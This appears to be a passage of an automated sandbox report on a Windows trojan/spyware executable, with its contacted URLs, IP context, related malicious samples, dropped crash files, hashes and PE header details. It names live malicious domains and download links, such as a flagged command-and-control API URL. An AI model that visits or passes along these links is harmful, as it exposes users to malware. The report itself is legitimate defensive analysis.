                https://closedjuruwk.shop/M7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y7Y18r(97).exefalse
                • URL Reputation: safe
                		unknown
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crt.rootca1.amazontrust.com/rootca1.cer0?7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://closedjuruwk.shop/7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000002.1752535595.000000000084C000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://closedjuruwk.shop/apiew7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1613541377.00000000008BC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://closedjuruwk.shop/api?7Y18r(97).exe, 00000000.00000003.1659282528.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000002.1752535595.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://closedjuruwk.shop/)7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                188.114.97.3
                		closedjuruwk.shopEuropean Union
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1480528
                Start date and time:2024-07-24 21:00:55 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 23s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:7Y18r(97).exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 31
                • Number of non-executed functions: 142
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.168.117.173
                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: 7Y18r(97).exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:02:08API Interceptor8x Sleep call for process: 7Y18r(97).exe modified
                15:02:24API Interceptor1x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.97.3Quotation.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/jk8Z5I
                NUEVO ORDEN01_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
                DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/cyd
                QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/4jaIXkvS/download
                QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/PM6yPStj/download
                QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/0DmcWsUI/download
                QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/4jaIXkvS/download
                QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/PM6yPStj/download
                Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • tny.wtf/Dl
                #U00d6deme kopyas#U0131.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUS7Y18r(69).exeGet hashmaliciousUnknownBrowse
                • 162.159.61.3
                http://id.cemgage.comGet hashmaliciousUnknownBrowse
                • 104.16.141.114
                https://sourceconnect.bigreport.com/verify?token=qRTJWwwWaHLZrsa2ALkGE2xQJBJOUj7LGet hashmaliciousUnknownBrowse
                • 104.18.35.133
                7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                • 188.114.96.3
                Fd_HR24 Jul, 2024.pdfGet hashmaliciousPhisherBrowse
                • 172.64.41.3
                7Y18r(114).exeGet hashmaliciousUnknownBrowse
                • 104.16.185.241
                7Y18r(114).exeGet hashmaliciousUnknownBrowse
                • 104.16.185.241
                Restortion.clinic.exeGet hashmaliciousEmpyrean, Discord Token StealerBrowse
                • 104.16.124.96
                https://url5041.app.lucid.co/uni/ls/click?upn=u001.9CEiYqsCeDB7JcEaXQIz-2F9XjjPqk-2Fb4pFcLw69B6WqTy-2BbVFLiir3sSJZjbRo6mBAwRtKNr9Kf4WztrdCBts7iyzvcJ-2FIUH0XDrcbuiiKrlzy8ZwzSxYR1urVGEa2H8lG0Sg7ExDExUtTEJeACnxEcvsJ4CnFcY2OyyabtZjsqjBmQJR0iCaQNYCn9tJqfPt0sqRsrpUZbmtTsF5u4sk76aC5ja3Exi0TVSSBuxtzkkrePRrkTP-2FRoxSefUr1y9ilFhR_7YHA5TjKTAFn3LEZM-2F5lkHKyiA7Z3uxS7g7w0lpFY3VgLh-2FDGXI29ABs2GTmbGZIZHIxymEIAIiyGRh1AnBalmp58yag9E-2FrtA2h0nETB9HIcrFd1W-2BMglDx2EcdWaE0YUaZKghF9gUd9evpWd9o10VlCUS2n6DDMef1lVzEPNeAVIceaFC5X-2FwVIdJYlE5ubbjTe48aOxl7EYAkQAbI29zMPLBfzmo3-2F0oDrCz1NV8Z-2BgLjNSkhEL0v7ztjcjSQNYmg2ZtX7GcpdQCCaWNVfhkazGgvvJB3QcWd-2Fo6uMwkENEvM1i8Q5dxjk3O7SagsKeqlZGHyVQYiVQV70Bj-2BqwPqn7sRJMYA1CWG3MbbSEiFggnHBU9leFka7-2BLjrmTxclzDNBbGoPiatzLWpKmVvw-2Bx5nC-2FbsV4WwngsYxWK1QG1aOsoJu-2FNsl5G06ywgOfHOifxw2PEX15DLqK9LKLpY23-2B0gBFiHHbP5xi3TlZqqdPIKY76qvnZKXKkRHP7lkjW54-2BjkWiD-2BFCJF-2BYwCLISwPacjQQKLVdWymA0jKWf0m780jvwQKochVtFIfu-2BJ9NnI-2BB2EwWIxQXcbAMYwMXcMBTQTHy61gyJ3FTzWhBE5wfCKo-2F8oXN5UhSp4kSbC0WEoFb3T831Z02n3p5vAL-2Ftzsl33DNu9nwqX-2FymwJG6bbNN49b2LwjYn6qVJYWS5SHBoNvXFMznGKBB-2Fn-2B5ec0wzJuS2t1Z7ZojX-2BZTbH-2F00rb4HPN-2BmX2VUh9CatGg9L1JM7vsjjRJrthuxEvN6-2BOqDHpRQ-2FjJ2ng1sbFzjs5LWXRhQ7AwghmMB4i-2FOI7rRtGet hashmaliciousUnknownBrowse
                • 172.64.150.44
                https://hardbin.com/ipfs/bafybeiga5vzkl7kqn7di5xybctgfvt4qeafpco3tdquxl7efx55uscqpeiGet hashmaliciousUnknownBrowse
                • 104.17.25.14

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e17Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                • 188.114.97.3
                7Y18r(111).exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                7Y18r(111).exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                XEV5ucEWu7.exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeGet hashmaliciousBdaejec, PrivateLoaderBrowse
                • 188.114.97.3
                qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
                • 188.114.97.3
                VaajyQsbTV.exeGet hashmaliciousGhostRat, NitolBrowse
                • 188.114.97.3
                PXTCFXKM.exeGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                RQTMGXIK.msiGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                szw3yovpYg.exeGet hashmaliciousUnknownBrowse
                • 188.114.97.3

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7Y18r(97).exe_938629191aae7b6c216c304dc83508b28629ed_f22eac21_101b2203-1698-4cd6-bed7-9dbafd4c4702\Report.wer

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.07145840437574
                Encrypted:false
                SSDEEP:192:VQIOGS0BU/gjkommbVzuiFqZ24IO8L2I:OZGZBU/gjfVzuiFqY4IO8L2
                MD5:CF037AF9A535765AE9351E1857F1AAEB
                SHA1:4E5DA23E762A59F806AD0ED1E67B73461B200B97
                SHA-256:C1F9A8C1919AF94F2323724B3A4F855D3C8D72B2216729B627D15E3EF0B7EE5C
                SHA-512:FA2561DC7AF6A9EFEA07F68E9AF5A3909087755575A3AB6C0B7A203F08B33D7B6AD7D675CB3F8396EB48EDA47A31334A04F47C4FE4D5DF9894B6955A3A586EF4
                Malicious:true
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.1.3.3.9.2.4.7.6.1.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.1.3.4.0.0.7.5.7.3.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.1.b.2.2.0.3.-.1.6.9.8.-.4.c.d.6.-.b.e.d.7.-.9.d.b.a.f.d.4.c.4.7.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.f.a.9.0.7.7.-.6.e.5.e.-.4.5.8.a.-.9.a.1.7.-.0.3.1.3.d.1.6.4.4.5.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.Y.1.8.r.(.9.7.)...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.c.-.0.0.0.1.-.0.0.1.4.-.9.a.d.0.-.e.f.e.f.f.b.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.1.b.c.2.b.c.7.5.d.7.7.0.1.8.d.4.8.5.b.1.9.f.5.a.1.7.f.9.0.7.c.0.0.0.0.0.0.0.0.!.0.0.

                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8B9.tmp.dmp

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 19:02:19 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):106964
                Entropy (8bit):2.1252231635687093
                Encrypted:false
                SSDEEP:384:BSJ0E3TIuVDdG52brgNvlfOz6b9Dr3UlOsorot/cYImWeozohh6NCh//cRx4/:Mf3jVRG523avBOz6F3+t694sxk
                MD5:64B8CF30FA911DE1DCA8448E4CF745F9
                SHA1:3AEB79089DA0D17EB36DD6FB8A6A21F8DC25E16E
                SHA-256:47BD3B6BEC108B87230C620A4005530E5AAB5452940042C2782D2487FC5B1026
                SHA-512:E01C531FBDCFE22D4DB2EFE648D49B91FECC9C4E06AC7A6C59CDF81274909FD7E3B2706214CAB6C1A8E78B5ADCD946389888639A76A8C97EEDAB3CA7879C3EF8
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... ........O.f.........................................#...........N..........`.......8...........T...........`A..t`..........\$..........H&..............................................................................eJ.......&......GenuineIntel............T.......,....O.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB0C.tmp.WERInternalMetadata.xml

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8374
                Entropy (8bit):3.7066006831604867
                Encrypted:false
                SSDEEP:192:R6l7wVeJ906aC6YSIMSU5cngmf2Zprn5x89b9NsfcMfm:R6lXJe6aC6YOSU5egmf2E9Gfc5
                MD5:A4CB37D43C4C37EE49B04EF4AD3CEDE8
                SHA1:B22E8E6CA831FFA90F8BDB0C8A4CFAED2D632C8F
                SHA-256:4AC8EDDDF5755D2F5A7663E785911B9543B67A64AFBC923001D6E15874ED5827
                SHA-512:96EE089238F9C81DD6BE847816C2FFF32580695E634CBFB48D0CF44BB42A615CA9ADB66038C3ED65C7CE0B893E7BFA9C0501F0FB41370CB3BE167B62BF85ED6C
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.2.4.<./.P.i.

                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB3B.tmp.xml

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4720
                Entropy (8bit):4.469012900402109
                Encrypted:false
                SSDEEP:48:cvIwWl8zskrJg77aI9uxWpW8VYQoYm8M4J7wFFH+q80dHevyd:uIjfQI78g7VlJOHVHevyd
                MD5:8DC7699FEFFE80FC19E16B57A08B7B4A
                SHA1:518FC4830EAEC316BA19AAA44E10BA46E15D47EF
                SHA-256:354D1E942FDBAE4E061FA49D3D23B8CCAF966F4A60764EBDF0FA8ED104959C0D
                SHA-512:382F764FC4028A99C654776E71513DFAEC2CE1513FF0F28E914403C5710DDBD37ACA9AA83EAA350D39B291AC4043A2385A0FD322EBFB40C687367CDBB4E9696E
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                C:\Windows\appcompat\Programs\Amcache.hve

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.372988945177478
                Encrypted:false
                SSDEEP:6144:eFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguN4iL:OV1QyWWI/glMM6kF7mq
                MD5:F24C1885CF371506D6211775DF4D7CB2
                SHA1:2CFC30BF8AC457178745AA4887684B4B49B9B0CC
                SHA-256:89F023E93BB28D94E422DD86E66905CFEE0D7070F6EFE8B7037408C3E0F6668F
                SHA-512:417059E1A50B2563D2DC7163F56A6828EAB9B22ACE2855BA7BF4BA67C3413D8082AC0C194074149C868D1A4B927206C0BFE273BFFAD197D5754F8B5F7EADB7A3
                Malicious:false
                Reputation:low
                Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.R....................................................................................................................................................................................................................................................................................................................................................5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.965077232784128
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.40%
                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                • Windows Screen Saver (13104/52) 0.13%
                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                • Generic Win/DOS Executable (2004/3) 0.02%
                File name:7Y18r(97).exe
                File size:10'906'544 bytes
                MD5:cdc633170ad40f573d38afef8a18f53f
                SHA1:7613f84e8daaa2e09f8cdd237bc1d5c9edd23839
                SHA256:6e787abd345af6092e3b22f603f4c32eb667e45c911219d2092ef6664b8b3efa
                SHA512:5218836d3f69e8dce0333fa73468a8c8665a28e6f6d08d32a10e915053ea770daa5829369aaf5042f54994e4dae59038a8c601129ddf46c185bd2910abe8cd5e
                SSDEEP:196608:IW1aJHll+Hpy8r5c8mlcdmlgWTUP8v71aJHll+Hpy8r5c8mlcdmlgWTUP8L:IkAHlcHpyT8mlwMgiZAHlcHpyT8mlwMD
                TLSH:7EB6233FB268AC3EC9BD0B7256B79250497B7B65681A8C5F03F0041DCFEA5A01E3B615
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                File Icon

                Icon Hash:0f0171e1f1313113

                Static PE Info

                General

                Entrypoint:0x4b5eec
                Entrypoint Section:.itext
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:1
                File Version Major:6
                File Version Minor:1
                Subsystem Version Major:6
                Subsystem Version Minor:1
                Import Hash:5a594319a0d69dbc452e748bcf05892e

                Authenticode Signature

                Signature Valid:false
                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                Signature Validation Error:The digital signature of the object did not verify
                Error Number:-2146869232
                Not Before, Not After
                • 12/09/2022 02:00:00 12/09/2025 01:59:59
                Subject Chain
                • CN=Jean Lalonde, O=Jean Lalonde, S=Quebec, C=CA
                Version:3
                Thumbprint MD5:B03B8259519CB895A180D4E81057B434
                Thumbprint SHA-1:F4017D41FF031D20C17EEC1D6B25B5E9254C496A
                Thumbprint SHA-256:EFA8022F667789105045322F856912FE246D68E9C732669663DF04BA99916B90
                Serial:3D6E64176832130088FB20EC3E1689C7

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFA4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-3Ch], eax
                mov dword ptr [ebp-40h], eax
                mov dword ptr [ebp-5Ch], eax
                mov dword ptr [ebp-30h], eax
                mov dword ptr [ebp-38h], eax
                mov dword ptr [ebp-34h], eax
                mov dword ptr [ebp-2Ch], eax
                mov dword ptr [ebp-28h], eax
                mov dword ptr [ebp-14h], eax
                mov eax, 004B10F0h
                call 00007F0F2CBF3275h
                xor eax, eax
                push ebp
                push 004B65E2h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 004B659Eh
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [004BE634h]
                call 00007F0F2CC9599Fh
                call 00007F0F2CC954F2h
                lea edx, dword ptr [ebp-14h]
                xor eax, eax
                call 00007F0F2CC08CE8h
                mov edx, dword ptr [ebp-14h]
                mov eax, 004C1D84h
                call 00007F0F2CBEDE67h
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [004C1D84h]
                mov dl, 01h
                mov eax, dword ptr [004237A4h]
                call 00007F0F2CC09D4Fh
                mov dword ptr [004C1D88h], eax
                xor edx, edx
                push ebp
                push 004B654Ah
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                call 00007F0F2CC95A27h
                mov dword ptr [004C1D90h], eax
                mov eax, dword ptr [004C1D90h]
                cmp dword ptr [eax+0Ch], 01h
                jne 00007F0F2CC9C00Ah
                mov eax, dword ptr [004C1D90h]
                mov edx, 00000028h
                call 00007F0F2CC0A644h
                mov edx, dword ptr [004C1D90h]

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xf36.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x64800.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0xa640300x2b80
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xc22e40x244.idata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xb361c0xb3800fc18e829cea6cb36db221a246c2e103cFalse0.3474821552924791data6.3677267302271465IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .itext0xb50000x16880x1800d40fc822339d01f2abcc5493ac101c94False0.544921875data5.972750055221053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data0xb70000x37a40x38004c195d5591f6d61265df08a3733de3a2False0.36097935267857145data5.044400562007734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .bss0xbb0000x6de80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xc20000xf360x1000a73d686f1e8b9bb06ec767721135e397False0.3681640625data4.8987046479600425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didata0xc30000x1a40x20041b8ce23dd243d14beebc71771885c89False0.345703125data2.7563628682496506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .edata0xc40000x9a0x20037c1a5c63717831863e018c0f51dabb7False0.2578125data1.8722228665884297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .tls0xc50000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xc60000x5d0x2008f2f090acd9622c88a6a852e72f94e96False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
